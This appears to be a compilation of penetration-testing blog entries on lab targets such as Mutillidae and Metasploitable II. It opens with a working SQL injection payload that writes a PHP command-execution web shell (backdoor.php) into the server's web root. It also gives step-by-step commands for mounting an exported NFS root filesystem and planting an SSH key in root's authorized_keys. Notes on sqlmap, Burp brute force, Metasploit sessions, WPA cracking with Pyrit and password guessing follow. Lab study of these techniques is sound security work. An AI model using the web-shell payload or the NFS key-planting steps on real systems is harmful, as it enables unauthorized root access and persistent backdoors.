Mutillidae: Inject Web Shell Backdoor via SQL Injection

Using somewhat advanced SQL injection, we inject a new PHP file into the web root of the PHP server using and SQL injection vulnearbility in Mutillidae. The injection is a command shell written in PHP that give root access to the operating system.


A harmless example;


username=' union select null,1,null,null,null INTO DUMPFILE 'test.txt' -- '&password=&login-php-submit-button=Login

The backdoor;

' union select null,null,null,'<form action="" method="post" enctype="application/x-www-form-urlencoded"><table style="margin-left:auto; margin-right:auto;"><tr><td colspan="2">Please enter system command</td></tr><tr><td></td></tr><tr><td class="label">Command</td><td><input type="text" name="pCommand" size="50"></td></tr><tr><td></td></tr><tr><td colspan="2" style="text-align:center;"><input type="submit" value="Execute Command" /></td></tr></table></form><?php echo "<pre>";echo shell_exec($_REQUEST["pCommand"]);echo "</pre>"; ?>' INTO DUMPFILE '..\\..\\htdocs\\mutillidae\\backdoor.php' --

Hurray!

SQL Injection using SQLMap to Dump Some Cool Stuff (mutillidae)

After you get the HTTP request from burp suite to a text file, then we can use that file in SQLMap to begin injection.

Brute-force Authentication - Burp Suite

Here is the basic methods to brute force a web app. I found it very clean and tidy. Nice work.

Mutillidae: Basics of Web Request and Response Interception with Burp-Suite

There is something more here;

• It explains the method to bypass the java script validation built on the client side (browser). 
• After transferring normal strings, change the strings to SQL injection on-the-fly with Burp or another proxy utility.

Fun stuff! :)

Exposing Flash Application Vulnerabilities with SWFScan

Download link on White Rabbit Blog;
http://h30499.www3.hp.com/t5/Following-the-White-Rabbit-A/SWFScan-FREE-Flash-decompiler/ba-p/5440167

sessions (msfconsole)

Is there a background session?

sessions

.
.
list the sessions established
.
.

to connect one of them

sessions -i [session_id]

Unix Fundamentals - NFS Service / Attack Illustration

look at the Network File System (NFS). NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services.The example below using rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu packages to follow along.

root@ubuntu:~# rpcinfo -p 192.168.99.131

.
.
.

    100003    2   tcp   2049  nfs

    100003    3   tcp   2049  nfs

    100003    4   tcp   2049  nfs

.
.
.

root@ubuntu:~# showmount -e 192.168.99.131



Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file: 


root@ubuntu:~# ssh-keygen
root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/

mount.nf: rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd. 
mount.nfs: an incorrect mount option was specified.


This is the message you get when you try to mount the NFS export. 

restarting nfs-common is not enough

• service nfs-common restart

restarting rpc will resolve the issue.

• service rpcbind restart

root@ubuntu:~# cat /root/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys 


ssh root@192.168.99.131 

//with the password generated on the ssh-keygen (then add our pub file -key- into the account's authorized_keys file on the remote machine), you can access to the remote system. yay. 

root@metasploitable:~#



The environment include Kali and Metasploitable II.

Reference:
https://community.rapid7.com/docs/DOC-1875 

"du" //du -sh

grand!

Pyrit -WPA/WPA2-PSK Epic Fail-

Pyrit allows to create massive databases, pre-computing part of the IEEE 802.11 WPA/WPA2-PSK authentication phase in a space-time-tradeoff. Exploiting the computational power of Many-Core- and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.

WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from themaster key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog.

https://code.google.com/p/pyrit/

Attacking the Domain

Windows is the first domino..

How do you crack the tough nuts?
 - Unguessable, uncrackable passwords
 - No known exploits
 - Not allowed to fuzz or write exploits
 - Modern OS protections
 - Modern networking protocols
 - Very Critical Production Environments.

Attacking the domain.

Think Fi'nesse
- the skillful handling of a situation; adroit maneuvering.

Password Guessing

Tools that excel at this;

- THC-Hydra 

freeworld.thc.org/thc-hydra/

- enum - darkridge.com/~jpr5/code.html

Fuzzing (Intro)

When it comes to testing the security posture of a target application, nothing is more indicative than supplying the application with random data and seeing it crash. The idea behind fuzzing is to automate the generation and feeding of data that will identify flaws in a target application.

·         Introduction

By automating fault injection, a researcher can identify flaws in an automated fashion and focus his or her attention on assessing the risk associated with any vulnerabilities found. The automated fault injection is better known as fuzzing, and has been introduced in many Software Development Life Cycles (SDLC) to identify both easy to find flaws and security issues that might require a more targeted approach. This article will introduce the idea behind fuzzing and explain where this approach can be useful and also what the shortcomings are.

·         Dumb Fuzzing

Software that does fuzzing usually falls under two categories. Dumb fuzzing usually consists of simple modifications to legitimate data, that is then fed to the target application. In this case, the fuzzer is very easy to write and the idea is to identify low hanging fruit. Such flaws are usually found on the surface of the application code and do not require other dependencies or perquisites before the vulnerability can be triggered. An example of a dumb fuzzer to tests a file format parser would be one that takes a valid file and replaces each 2 bytes with an 0xFFFF one test at a time. An example of such a fuzzer is FileFuzz by iDefense. Although not an elegant approach, dumb fuzzing can produce results, especially when a target application has not been previously tested.

·         Intelligent Fuzzing

A security researcher will probably initially work with a dumb fuzzer because it is so easy to setup and to get a general idea of the target application. However many commercial applications are more robust and will not choke on data generated with a dumb fuzzer. In that case a security researcher might make use of a fuzzer that knows the protocol or format of the data. Some protocols require that the application (fuzzer) keeps a state, for example in the case of HTTP or SIP. Other protocols will make use of authentication or a valid CRC before any vulnerabilities are identified. If a target application makes use of a CRC, mutated data produced by a dumb fuzzer would never reach vulnerable code. Apart from providing much more code coverage, intelligent fuzzers tend to cut down the fuzzing time significantly since they avoid sending data that the target application will not understand. Intelligent fuzzers are therefore much more targeted and sometimes they need to be developed by the security researcher himself. Available fuzzing frameworks such as Sulley and Peach can make this task less of a challenge, and one may be able to setup a fully working fuzzer in a couple of minutes.

·         Fuzzing and your Security Testing approach

When compared to other software security testing methods, fuzzing provides a good starting point. By making use of fuzzing, a researcher can identify flaws in software that he or she does not have full access to and take a blackbox approach. Since test cases are automated, different lengths and variations of the same data can be produced in a very short time; something that be impossible to perform manually. However, unless the fuzzer fully understands the target application and especially in the case of complex code, a fuzzer may only scrape the surface when it comes to identifying vulnerabilities. Fuzzing will also not identify logic issues. For example, a backdoor in an authentication procedure will not be found using the fuzzing approach. Such vulnerabilities can only be found by careful understanding of the target application, with code reviews and reverse engineering techniques.

·         Conclusion

The place of fuzzing should probably along side regression testing in the SDLC, where before each major build the target application is tested against a set of mutated data. It is important to realize that fuzzing does not replace manual approach to security testing but rather complement it by providing time saving and unique advantages to vulnerability research.

http://www.brighthub.com/computing/smb-security/articles/9956.aspx

Using Armitage & Metasploit on BackTrack 5

Nice integration.